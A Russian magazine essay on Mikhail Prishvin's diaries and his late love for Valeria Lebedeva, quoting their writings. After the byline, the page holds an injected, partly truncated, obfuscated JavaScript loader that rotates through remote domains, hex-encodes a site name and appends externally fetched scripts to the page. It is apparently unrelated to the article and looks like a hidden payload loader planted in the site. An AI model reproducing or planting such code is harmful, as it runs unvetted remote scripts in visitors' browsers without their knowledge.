«Я постараюсь быть лучше себя», или Ещё раз про Любовь (Л.Кичаева)
«Я постараюсь быть лучше себя», или Ещё раз про Любовь (Л.Кичаева)
<dl class="article-info">Подробности Категория: №9 Вести сентябрь 2015 год Просмотров: 95</dl>
| |
Мы привыкли имя Михаила Пришвина ассоциировать с рассказами о природе, детскими рассказами, но мало кто знаком с истинным Пришвиным, глубоким мыслителем, тонким знатоком русской души. Таким узнали мы о нём, что называется, из первых уст, от самого писателя, из его дневников, которые он вёл с юности. Дневники Пришвина втрое больше по объёму всех его произведений, и, как признавался сам Михаил Михайлович, — они оказались самым главным его трудом жизни. |
|
Жизнь как ниточка. У кого-то она запутанная, даже с узлами, у кого-то с зигзагами-поворотами, но вряд ли бывает как струночка прямая. Ниточка Пришвина представилась волнистой прямой. И получается такая ровность от смирения, от умения сглаживать конфликты, не лезть на рожон, не рубить правду-матку сплеча…
Вся жизнь Пришвина была посвящена любви.Её поиску, зову, тонкому вслушиванию в окружающий мир… И о чём бы ни писал он: о птицах или о Китеж-граде, о степи киргизской или о болотах среднерусских, — всегда писал именно о любви. «Животным, от букашки до человека, самая близкая стихия — это любовь, а растениям — вода: они жаждут её, и она к ним приходит с земли и с неба, как у нас бываетлюбовь земная и небесная…»
Страстно страждущий любви и стремящийся к ней, писатель в конце концов обретает ЛЮБОВЬ во всей её полноте.
«...Утверждаю, что на земле у людей существует великая любовь, единая и беспредельная. И в этом мире любви, предназначенной человеку для питаниядуши в той же мере, как воздух для крови, я нахожу единственную, которая соответствует моему собственному единству, и только через это соответствие,единство с той и с другой стороны вхожу я в море всеобщей любвичеловеческой».
Пробежимся по жизненной ниточке Михаила Михайловича Пришвина, чтобы лучше понять историю его Большой Любви.
Родился Пришвин 23 января 1873 года, в Орловской губернии. Сын разорившегося купца. Окончил Лейпцигский университет. Во время учёбы Михаил полюбил студентку Сорбонны Варвару Измалкову. Девушка отказала ему, и это стало большой душевной трагедией.
Даже спустя 30 лет Пришвин никак не мог успокоиться. Он снова и снова спрашивал себя: что было бы, если бы та юношеская любовь окончилась браком? И сам же отвечал: именно мучения и страдания от нерешённого противоречия между духом и плотью сделали его настоящим писателем.
В 32 года Пришвин женился на неграмотной крестьянке Ефросинье Павловне Смогалевой, которая с годовалым сыном сбежала от жестокого мужа. Семейная жизнь не задалась с самого начала — слишком разными были они по своему душевному складу и воспитанию. Однако этот странный брак продлился почти 30 лет.
Свои душевные терзания Пришвин заглушал в странствованиях по России, но тоска по единственной на свете Женщине, грёзы о любви и семейном счастье не покидают его. «Потребность писать есть потребность уйти от одиночества, разделить с людьми свое горе и радость… Но горе я оставил при себе и делился с читателем только своей радостью».
«Душа моя завешена кругом, а жизнь идёт сама по себе, и часто я с удивлением спрашиваю себя, как это так может быть, чтобы жизнь шла без души, иногда стучусь — нет! Всё запечатано, закутано».
Многие так всю жизнь и проживают с запечатанной душой и даже не подозревают, что можно жить иначе. Пришвин чувствовал очень остро, что жизнь без любви проходит напрасно.
В 1937 году Михаил Михайлович отделился от семьи, но не порвал окончательно. Отношения с детьми и женой сохранялись «не оскорбляя прошлого». Он получил в Москве новую четырёхкомнатную квартиру, а жене оставил дом в Загорске. По меркам того времени Пришвин был очень богат: квартира со старинной мебелью красного дерева и с венецианской люстрой, домработница, автомобиль, собаки, орден, успех…
...Одиночество. Оно подчеркнуто в качестве эпиграфа в дневнике коротким рассказом: «Возвращаясь домой, всегда открываю буфет и даю чего-нибудь
Ладе. Зато, как бы надолго я с ней ни расставался, как бы ни радовался встрече с ней, завидев меня, она встает и глядит на буфет. Люблю я эту собаку, у неё такие прекрасные глаза... Быть может, никого у меня и нет, кроме Лады. Лада моя! — радуюсь я ей. А она глядит на буфет...»
«Может, мне когда-нибудь встретится друг и я выскажусь ему до конца», — писал Пришвин в дневнике за 1932 год. Писателю было тогда 60 лет. Друг этот в его представлении — женщина: «Одной сказать можно — а её нет. Неведомый друг! Как глубоко он скрывается, как невозможно трудна наша встреча!»
Но всё, к чему по-настоящему человек стремится, рано или поздно сбывается. Судьба подводит к заветной мечте. Теперь, спустя уже десятилетия, можно как бы сверху увидеть, как судьба вела навстречу друг другу две яркие личности. Впространстве тонкого мира факт встречи уже свершился, а два человека даже не догадываются об этом. Но события направляют в нужную сторону и, даже горькие, тяжёлые, оказываются необходимыми вехами на пути к исполнению заветной мечты.
В очередной Новый год по традиции Пришвин сжигает бумажку с одним единственным словом «Приди!». Но уже не верит в осуществление своей мечты. Пора и вправду поставить крест на ней, привести в порядок архив и передать в Литературный музей. Но для этого нужен секретарь; ему посоветовали кандидатуру Валерии Дмитриевны Лебедевой (Леорко).
Встреча произошла 16 января 1940 года. В самый холодный день самой холодной московской зимы, - 49 градусов с ветром. Этот день на целых 14 лет станет их праздником. В дневнике появляется запись: «Мы с ней пробеседовали без умолку с 4 часов до 11 вечера. Что это такое?» И следующая, самая короткая, состоит всего из двух слов: «А если..?» Писатель понимает, что Валерия и есть та, которую он всю жизнь звал и так долго ждал. Было ему в ту пору 67 лет. «Я понял на рассвете, что Бог создал меня самым счастливым человеком и поручил мне прославить любовь на земле».
…Ниточка жизни Валерии, сильнее закрученная поворотами и узелками, как бы повторяет судьбу России. Выросла Валерия в доме, где царили красота, благожелательность, физическая, духовная и нравственная чистота. Но с 1914 года и началом войны жизнь круто изменилась. Вначале — работа в госпиталях, шитьё для фронта, после гибели отца-офицера переезд в Москву, организация детского дома, учёба в Институте слова, Школе радости, посещение Вольной академии духовной культуры, встреча с первой любовью — незаурядным мыслителем Олегом Полем, философско-богословский труд которого «Остров Достоверности» был посвящён Валерии.
Олега расстреляли. Валерия, тяжело пережив утрату, через время выходит замуж, чтобы как-то дальше жить. По ложному доносу она попадает вначале в тюрьму, а затем вместе с мужем на три года в ссылку в Сибирь, в так называемую «вольную, за недоказанностью преступления», как и многие в те лихие годы.
Свою жизнь Валерия Дмитриевна описала в книге «Невидимый град». На её страницах перед нами предстаёт сильный духом человек, чувствующий богатство любви как величайшую реальность жизни, её цель, как исчерпывающий смысл своего существования. Валерия обладала даром любить: любила природу, её абсолютную красоту, гармонию, но главным была жажда любви к одному, единственному, избранному ею мужчине, другу. И она ожидает его изо дня в день, из года в год — всю жизнь.
«В этом одном (то есть в любви) опыт не даёт ничего,
и даже наоборот: чем больше опыт, тем больше
неведомой остаётся область любви… Так что есть
область жизни, которая не открывается в опыте»
(Михаил Пришвин).
«Так спрашиваю я себя и отвечаю: но как же Лев Толстой, уже глубокий старик, мудрец, отец многочисленного семейства, любимый и прославленный всем миром человек, все помыслы отдавший заботе о страдающих людях, как же он записал в своём старческом дневнике: «Самое сильное и тайное желание моё — это любить и быть любимым»?
И Она ждала Его. …Удары судьбы следовали один за другим, но так она подводила избранников к Встрече. Оказавшись на пределе сил, без жилья, документов, с больной матерью на руках, Валерия решает к концу 1939 года поставить крест на своих мечтах, да и всех надеждах жизни… А было ей тогда всего 40 лет. Может быть, им обоим нужно было дойти до предельной точки, чтобы наконец две ниточки судеб слились в единую?
«При первой встрече меня впечатлила только душа её... Значит, бывает же так у людей, и только у людей так, что вначале обнимаются только души, соединяются, проникаются и начинают медленно облекаться в животную плоть, и так происходит не совокупление, а воплощение. Я могу припомнить, как у моей Психеи создавались её прекрасные глаза, как расцветала улыбка, блестели и капали слёзы радости. И поцелуй, и огненное прикосновение, и весь огонь, в котором единился в одно существо разделённый грехом человек».
Неодетой весной называет Пришвин то время, что предшествует скоротечному таянию снегов, — время предпробуждения, предощущения будущего расцвета. Это и было время «незаписанной любви» — единственная неделя в жизни Пришвина, когда он не сделал ни одной записи в своём дневнике. Период взаимного глубокого узнавания двух людей. Из насыщенной не внешними, но внутренними событиями недели выросла настоящая любовь, взаимное служение.
«Прошли дни, которых нельзя было записать. Но счастье в том, что дни эти не только не прошли, а не могут пройти, пока мы живы, дни останутся. И если записать нельзя, то можно о них написать: в природе была неодетая весна — у людей незаписанная любовь».
Пришвин делает предложение Валерии: «Согласны ли Вы со мной отправиться в далёкое путешествие, в неведомую страну и там создать себе Дом? И пусть в нашем союзе никогда не будет того, от чего погибает всякий обыкновенный союз: у нас никогда не будет в отношении друг к другу отдельных путей, нашидуши открыты друг для друга, и цель наша общая».
И получает ответ: «Слушайте внимательно: я решаюсь с радостью на то, чтобы быть с Вами, и не только в благополучии, но и во всех возможных трудностях и несчастьях».
Они старались быть достойными друг друга и того счастья, что подарила им судьба, они старались видеть друг в друге лучшее и для приумножения этого лучшего в себе трудиться любя. «Тот человек, кого ты любишь во мне, конечно, лучше меня: я не такой. Но ты люби, и я постараюсь быть лучше себя».
«Итак, открывается, что единственная реальность — любовь, что тайнавселенной — в понятии «мы», причём «мы» означает первоначальное «мы с тобой», а вглядеться поглубже — это вся вселенная».
Всё ими пережитое вылилось в совместную книгу «Мы с тобой». Как пишет Валерия Дмитриевна, «это реальный дневник М.М. Пришвина за 1940 год. Его переписывали мы оба совместно в первые военные годы… Во время работы иногда я делала тут же на машинке свои приписки. Они рождались сразу, под разговор, как реплики к переписываемому тексту».
«Женщина протянула руку к арфе, тронула пальцем, и от прикосновения пальца её к струне родился звук.
Так и со мной было: она тронула — и я запел».
Невероятно, но скончался Михаил Пришвин именно 16 января 1954 года — в одном дне сошлись встреча и разлука...
«Мне так кажется, будто мы с тобой по океану на двух льдинах плывём, моя поменьше, твоя побольше, моя раньше разобьётся, и я должен тебе поручить себя после моего неизбежного физического конца, а ты, когда сама разобьёшься со своей льдиной, попытайся нас поручить следующему носителю, как один поток, сливаясь, поручает другому свою воду нести в океан... зная неминуемый конец мой, поручаю себя твоему продолжению».
Людмила КИЧАЕВА,
Башкирия
<script type="text/javascript">// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("maxpark.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]></script>
Комментарии
Переписала Светлана Сергиенко.